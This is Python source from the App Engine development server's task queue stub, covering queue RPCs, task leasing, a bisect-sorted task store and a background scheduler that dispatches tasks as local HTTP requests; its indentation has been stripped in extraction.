def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
task.set_execution_count(task.execution_count() + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskExecutionCount': '1'),
('X-AppEngine-TaskRetryCount': '1'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('X-AppEngine-TaskPreviousResponse': '300'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskExecutionCount': '1'),
('X-AppEngine-TaskRetryCount': '1'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('X-AppEngine-TaskPreviousResponse': '300'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
@_WithLock
def RunTaskNow(self, task):
"""Change the eta of a task to now.
Args:
task: The TaskQueueQueryTasksResponse_Task run now. This must be
stored in this queue (otherwise an AssertionError is raised).
"""
self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
new_eta_usec: The new eta to set on the task. This must be greater then
the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
TaskQueueServiceError.TOMBSTONED: if the task was deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
retry_count = max(0, random.randint(-10, 5))
task.set_retry_count(retry_count)
task.set_execution_count(retry_count)
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers) - 1)
key, value = random_headers.pop(elem)
header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host, request_data):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
self._default_host = default_host
self._request_data = request_data
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, an _Queue instance.
Returns:
A list of tuples containing the http header and value. There
may be be mutiple entries with the same key.
"""
headers = []
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower == 'host' and queue.target is not None:
headers.append(
(header.key(), '.'.join([queue.target, self._default_host])))
elif header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task.eta_usec()))))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if (task.has_body() and 'content-type' not in
[key.lower() for key, _ in headers]):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task.execution_count())))
if task.has_runlog() and task.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task.runlog().response_code())))
return headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
Http Response code from the task's execution, 0 if an exception occurred.
"""
method = task.RequestMethod_Name(task.method())
headers = self._HeadersFromTask(task, queue)
dispatcher = self._request_data.get_dispatcher()
try:
response = dispatcher.add_request(method, task.url(), headers,
task.body() if task.has_body() else '',
'0.1.0.2')
except request_info.ModuleDoesNotExistError:
logging.exception('Failed to dispatch task')
return 0
return int(response.status.split(' ', 1)[0])
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
response_code = self.task_executor.ExecuteTask(task, queue)
if response_code:
task.mutable_runlog().set_response_code(response_code)
else:
logging.error(
'An error occured while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
now = self._get_time()
if 200 <= response_code < 300:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server='localhost',
_testing_validate_state=False,
request_data=None):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
_testing_validate_state: Should this stub and all of its _Groups (and
thus and all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE,
request_data=request_data)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
self._queues[None], _TaskExecutor(default_http_server,
self.request_data),
retry_seconds=task_retry_seconds)
self._yaml_last_modified = None
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in (
'queue.yaml', 'queue.yml',
os.path.join('WEB-INF', 'appengine-generated', 'queue.yaml')):
try:
path = os.path.join(self._root_path, queueyaml)
modified = os.stat(path).st_mtime
if self._yaml_last_modified and self._yaml_last_modified == modified:
return self._last_queue_info
fh = open(path, 'r')
except (IOError, OSError):
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
self._last_queue_info = queue_info
self._yaml_last_modified = modified
return queue_info
finally:
fh.close()
return None
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
